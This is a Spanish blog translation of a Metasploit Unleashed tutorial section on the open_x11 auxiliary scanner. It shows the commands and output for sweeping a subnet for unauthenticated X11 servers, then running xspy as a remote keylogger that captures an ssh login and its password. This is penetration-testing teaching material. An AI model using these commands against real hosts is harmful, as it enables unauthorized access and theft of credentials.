Metasploit Unleashed en Espanol (5.3/17)

8.1.10

Open X11

Parecido al escaner vnc_auth, el modulo Open_X11 escanea un rango objetivo en busca de servidores X11 que le permitira al usuario conectarse sin autentificacion. Piense en el devastador ataque que se puede llevar a cabo con este error de configuracion.

Para usar, una vez que se haya seleccionado el modulo auxiliar, definir las
opciones, y luego dejar correr. 

msf > use scanner/x11/open_x11
msf auxiliary(open_x11) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    6000             yes       The target port
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(open_x11) > set RHOSTS 192.168.1.1/24
RHOSTS => 192.168.1.1/24
msf auxiliary(open_x11) > set THREADS 50
THREADS => 50
msf auxiliary(open_x11) > run
[*] Trying 192.168.1.1
[*] Trying 192.168.1.0
[*] Trying 192.168.1.2
...
[*] Trying 192.168.1.29
[*] Trying 192.168.1.30
[*] Open X Server @ 192.168.1.23 (The XFree86 Project, Inc)
[*] Trying 192.168.1.31
[*] Trying 192.168.1.32
...
[*] Trying 192.168.1.253
[*] Trying 192.168.1.254
[*] Trying 192.168.1.255
[*] Auxiliary module execution completed
Solo un ejemplo de lo siguiente que podriamos hacer, cargar un keylogger remoto.

root@bt4:/# cd /pentest/sniffers/xspy/
root@bt4:/pentest/sniffers/xspy# ./xspy -display 192.168.1.101:0 -delay 100

ssh root@192.168.1.11(+BackSpace)37
sup3rs3cr3tp4s5w0rd
ifconfig
exit
© Offensive Security 2009

  • Original by www.offensive-security.com
  • Traslated by Jhyx

Publicadas por Jhyx las 11:29 a.m.  

Etiquetas:

0 comentarios:

Publicar un comentario

Suscribirse a: Comentarios de la entrada (Atom)
Creative Commons License
Esta obra está bajo una licencia de Creative Commons.